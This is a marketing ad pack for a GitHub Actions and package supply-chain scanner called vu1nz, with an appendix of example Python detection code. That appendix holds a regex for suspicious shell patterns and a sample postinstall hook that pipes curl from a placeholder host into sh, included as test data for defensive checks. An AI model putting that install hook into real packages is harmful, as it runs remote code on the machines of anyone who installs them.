# vu1nz Ad Creative Pack

## Campaign Summary

vu1nz adds a missing security layer for GitHub-heavy teams: CI/CD workflow scanning plus package supply-chain scanning before risky changes merge. The campaign should speak to engineers and security teams who already use Dependabot, CodeQL, Snyk, or Semgrep but still worry about workflow YAML, GitHub Actions abuse, malicious package updates, typosquats, and install-script risk.

Primary CTA: Scan your public GitHub repo free.

Secondary CTA: Start a 14-day free trial.

## Target Audience

- DevOps engineers and platform teams responsible for GitHub Actions.
- Security engineers who own software supply-chain controls.
- CTOs and technical founders at GitHub-heavy teams.
- Open-source maintainers who want lightweight PR checks.
- Engineering managers who need a simple story for CI/CD risk.

## Messaging Pillars

- Breach prevention: the weak point may be a workflow or dependency diff, not app code.
- Developer utility: paste a public repo and get CI/CD findings fast.
- Competitive gap: Dependabot focuses on known CVEs; CodeQL focuses on app code; vu1nz watches CI/CD and new package risk.
- Fast install: install a GitHub App, no workflow YAML or secrets required.
- Open-source trust: MIT licensed, auditable, forkable, and usable alongside existing tools.

## Meta Ads

### Primary Text Variations

1. Your app code is scanned. Your dependencies are watched. But what about the GitHub Actions workflow that deploys production? vu1nz scans CI/CD and package supply-chain risk before a PR merges. Scan a public repo free.
2. Dependabot and CodeQL are useful, but they do not cover every workflow and package-diff risk. vu1nz adds 17 CI/CD checks plus new-package scanning for npm, pip, cargo, gem, Go, and Composer. Start with a free public repo scan.
3. One GitHub App. CI/CD workflow findings. Package supply-chain checks. PR comments for risky changes. vu1nz helps teams catch patterns traditional scanners often miss.

### Headline Variations

1. Scan CI/CD Risk Before Merge
2. Find GitHub Actions Weak Spots
3. Add Supply-Chain Checks to PRs

### Description Variations

1. Free public repo scans. 14-day trial for teams.
2. Use alongside Dependabot, CodeQL, Snyk, and Semgrep.
3. CI/CD workflow checks plus package-diff scanning.

### Image Ad Concepts

1. Split-screen PR comment: left side "No vulnerabilities found" from a traditional tool; right side vu1nz flags "Unpinned action" or "Suspicious postinstall script." Caption: "Different scanners. Different blind spots."
2. Security stack diagram: Dependabot for known CVEs, CodeQL for app code, vu1nz for CI/CD and package-diff risk. Caption: "Close the layer your stack may not be watching."

### Short Video Concept

Scene 1: A PR adds a dependency and changes a GitHub Actions workflow.
Scene 2: Existing tools pass.
Scene 3: vu1nz comments with a workflow risk and package warning.
Scene 4: Engineer fixes before merge.
End card: "Scan your public GitHub repo free."

Recommended Meta sizes: 1080x1080, 1080x1350, 1200x628.

## Reddit Ads

### Promoted Post Titles

1. I built a scanner for the CI/CD risks Dependabot does not cover
2. Your GitHub Actions workflow is part of your attack surface
3. Free public repo scanner for GitHub Actions security checks

### Body Copy Variations

1. Dependabot catches known vulnerable dependencies. CodeQL catches code issues. vu1nz focuses on the CI/CD and package-diff layer: risky GitHub Actions patterns, unpinned actions, suspicious package additions, and install-script risk. Paste a public repo and get a free scan.
2. If your team ships through GitHub Actions, the workflow file is production infrastructure. vu1nz scans PRs for workflow and supply-chain patterns that often sit outside normal app-code scanning. It is MIT licensed and designed to run alongside your existing stack.
3. Not a replacement for Dependabot or CodeQL. A second layer. vu1nz checks GitHub Actions and newly added packages before merge, then posts findings in the PR so engineers can fix them in review.

### Reddit-Native Angles

1. "We already have Dependabot" angle: Respect that answer, then show the gap. "Keep it. This catches a different class of risk."
2. "CI is production" angle: Position workflow YAML as deploy infrastructure, not config trivia.

### Image Concepts

1. Minimal dark terminal card with repo input and "17 CI/CD checks complete."
2. PR review card with a vu1nz finding: "Unpinned third-party action - pin to SHA."

### Short Video/GIF Concept

Cursor pastes `vercel/next.js` into the scanner, result cards animate in, then cut to "Install GitHub App for PR comments."

## Google Search Ads

### Short Headlines

1. GitHub Actions Scanner
2. CI/CD Security Checks
3. Supply Chain PR Scanner
4. Scan Public Repos Free
5. Find Workflow Risk Fast
6. Dependabot Gap Coverage
7. Package Diff Security
8. PR Security Comments
9. Open Source CI Scanner
10. 14-Day Team Trial

### Long Headlines

1. Scan GitHub Actions And Package Supply-Chain Risk Before Merge
2. Add CI/CD Workflow Security Checks To Your Pull Requests
3. Use vu1nz Alongside Dependabot, CodeQL, Snyk, And Semgrep
4. Free Public Repo Scanner For GitHub Actions Security Findings

### Descriptions

1. Catch CI/CD workflow and package-diff patterns before risky PRs merge. Free public repo scans.
2. Add a missing supply-chain layer to GitHub PR review. 17 CI/CD checks plus package scanning.
3. Not a replacement for Dependabot or CodeQL. Use vu1nz to cover workflow and new-package risk.
4. Install the GitHub App, scan PRs, and get actionable comments for engineers.
5. MIT licensed and built for GitHub-heavy teams that need practical supply-chain controls.
6. Start with a public repo scan, then try team protection free for 14 days.

### Suggested Keywords

- github actions security scanner
- ci/cd security scanner
- github workflow security
- supply chain security scanner
- npm malware scanner
- package supply chain security
- dependabot alternative
- codeql alternative
- pr security scanner
- github app security scanner
- typosquat detector
- unpinned github actions

### Suggested Negative Keywords

- jobs
- course
- certification
- salary
- free antivirus
- generic vulnerability scanner
- network scanner
- pentest jobs
- resume
- internship

## Google Display Ads

### Headline/Body Combinations

1. Headline: CI/CD Is Attack Surface. Body: Scan workflow and package-diff risk before PRs merge.
2. Headline: Dependabot Has Blind Spots. Body: Keep Dependabot. Add vu1nz for CI/CD and new-package checks.
3. Headline: Scan A Public Repo Free. Body: Paste owner/repo and see GitHub Actions findings in seconds.

### Banner Concepts

1. 728x90: "Your PR passed. Your workflow still has risk." Button: "Scan Free"
2. 300x250: Security stack tiles: Dependabot, CodeQL, vu1nz. Caption: "Cover the CI/CD layer."

## YouTube / Video Concepts

### YouTube Shorts / Vertical

Opening: "The breach may not be in your code."
Shot: PR changes workflow YAML and adds a package.
Overlay: "Known CVEs? Covered. App code? Covered. CI/CD and package diff?"
Shot: vu1nz PR comment flags a risky pattern.
End: "Scan your public GitHub repo free."

### 15-Second Pre-Roll Script

"Your team scans code. Your team watches dependencies. But CI/CD is still part of the attack surface. vu1nz checks GitHub Actions workflows and new package changes before they merge. Paste a public repo for a free scan, or start a 14-day trial for PR comments."

## Image Creative Briefs

- PR Comment Creative: show a realistic GitHub PR with vu1nz commenting on a workflow issue. Keep code snippets tiny, readable, and non-alarmist.
- Security Stack Creative: show vu1nz as the third layer next to Dependabot and CodeQL. Avoid saying it replaces either tool.
- Repo Scanner Creative: show a simple input box with `owner/repo` and result cards for "workflow risk", "package diff", and "install script."
- Developer Meme-Lite Creative: "It passed CI" crossed out, replaced with "CI is what I am checking."

## Recommended Ad Sizes

- Meta: 1080x1080, 1080x1350, 1200x628.
- Reddit: 1200x628, 1080x1080, short GIF/video.
- Google Display: 300x250, 336x280, 728x90, 970x250, 160x600, 300x600, 320x50, 320x100.
- Video: 9:16 vertical, 1:1 square, 16:9 landscape.

## Best 3 Ads To Test First

1. Reddit title: "Your GitHub Actions workflow is part of your attack surface." This will resonate with technical readers and invite concrete discussion.
2. Google Search ad: "GitHub Actions Scanner" plus "Scan Public Repos Free." High intent and a low-friction CTA.
3. Meta/LinkedIn style static image: Dependabot + CodeQL + vu1nz stack diagram. It explains positioning without attacking existing tools.
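## Appendix: Example Checks Behind The Quoted Findings

The image concepts and creative briefs quote two findings, "Unpinned third-party action - pin to SHA" and "Suspicious postinstall script", and ask for tiny, realistic code snippets in the PR Comment Creative. The script below is an added example written for this pack so the creative team can render an accurate-looking finding; it is not vu1nz's code and does not reflect its actual 17 checks. The trusted-owner list, the suspicious-command patterns, the severity labels and the sample workflow and package.json inputs are all constructed assumptions for illustration.

```python
"""Added example (not vu1nz's code): two of the PR-review findings the creatives
quote, implemented as small checks over constructed inputs.

Assumptions: FIRST_PARTY_OWNERS, SUSPICIOUS_RE and the severity labels are
illustrative policy choices, not vu1nz's rule set."""
import json
import re

# `uses:` references in a workflow, e.g. `- uses: actions/checkout@v4` (quotes optional).
USES_RE = re.compile(r'^\s*-?\s*uses:\s*["\']?([^\s"\'#]+)', re.MULTILINE)
FULL_SHA_RE = re.compile(r'^[0-9a-f]{40}$')
FIRST_PARTY_OWNERS = ("actions", "github")  # assumption: treated as lower risk, not skipped

# npm lifecycle hooks that run on `npm install`, plus shell patterns worth a second look.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS_RE = re.compile(r'(curl|wget|base64|eval|\|\s*(ba)?sh\b|node\s+-e)')


def find_unpinned_actions(workflow_text):
    """Return findings for `uses:` references not pinned to a full 40-hex commit SHA.

    Local actions (./path) and docker:// images are skipped. Third-party actions
    on a tag or branch are 'high'; first-party ones are reported as 'low'."""
    findings = []
    for match in USES_RE.finditer(workflow_text):
        ref = match.group(1)
        if ref.startswith("./") or ref.startswith("docker://"):
            continue
        action, _, version = ref.partition("@")
        if FULL_SHA_RE.match(version):
            continue  # pinned to an immutable commit, nothing to report
        owner = action.split("/", 1)[0]
        severity = "low" if owner in FIRST_PARTY_OWNERS else "high"
        detail = f"'{version}' is a mutable ref" if version else "no version ref"
        findings.append({
            "ref": ref,
            "severity": severity,
            "message": f"Unpinned action: {detail}; pin to a 40-char commit SHA",
        })
    return findings


def find_package_diff_risks(old_package_json, new_package_json):
    """Compare two package.json texts: report newly added dependencies and
    install-time hooks that were added or changed, flagging suspicious commands."""
    old = json.loads(old_package_json)
    new = json.loads(new_package_json)
    findings = []
    for section in ("dependencies", "devDependencies"):
        added = set(new.get(section, {})) - set(old.get(section, {}))
        for name in sorted(added):
            findings.append({"kind": "new-package", "name": name,
                             "message": f"New {section} entry '{name}' needs review"})
    old_scripts = old.get("scripts", {})
    new_scripts = new.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = new_scripts.get(hook)
        if cmd is None or cmd == old_scripts.get(hook):
            continue  # hook absent or unchanged by this diff
        suspicious = bool(SUSPICIOUS_RE.search(cmd))
        label = "Suspicious " if suspicious else ""
        findings.append({"kind": "install-script", "name": hook, "suspicious": suspicious,
                         "message": f"{label}{hook} script added or changed: {cmd}"})
    return findings


# Constructed sample inputs (not from any real repository).
SAMPLE_WORKFLOW = """\
name: deploy
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: some-vendor/setup-tool@v2
      - uses: some-vendor/deploy-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - uses: docker://alpine:3.19
"""
OLD_PACKAGE_JSON = '{"dependencies": {"express": "^4.18.0"}, "scripts": {"test": "jest"}}'
NEW_PACKAGE_JSON = ('{"dependencies": {"express": "^4.18.0", "some-new-lib": "1.0.0"},'
                    ' "scripts": {"test": "jest",'
                    ' "postinstall": "curl -s http://example.invalid/x | sh"}}')

if __name__ == "__main__":
    for finding in find_unpinned_actions(SAMPLE_WORKFLOW):
        print(finding)
    for finding in find_package_diff_risks(OLD_PACKAGE_JSON, NEW_PACKAGE_JSON):
        print(finding)
```

On the sample workflow the script reports `actions/checkout@v4` (low) and `some-vendor/setup-tool@v2` (high), skips the SHA-pinned, local and docker steps, and on the package.json diff reports the new dependency plus the suspicious postinstall hook. Those two messages are the kind of wording the PR Comment Creative should show.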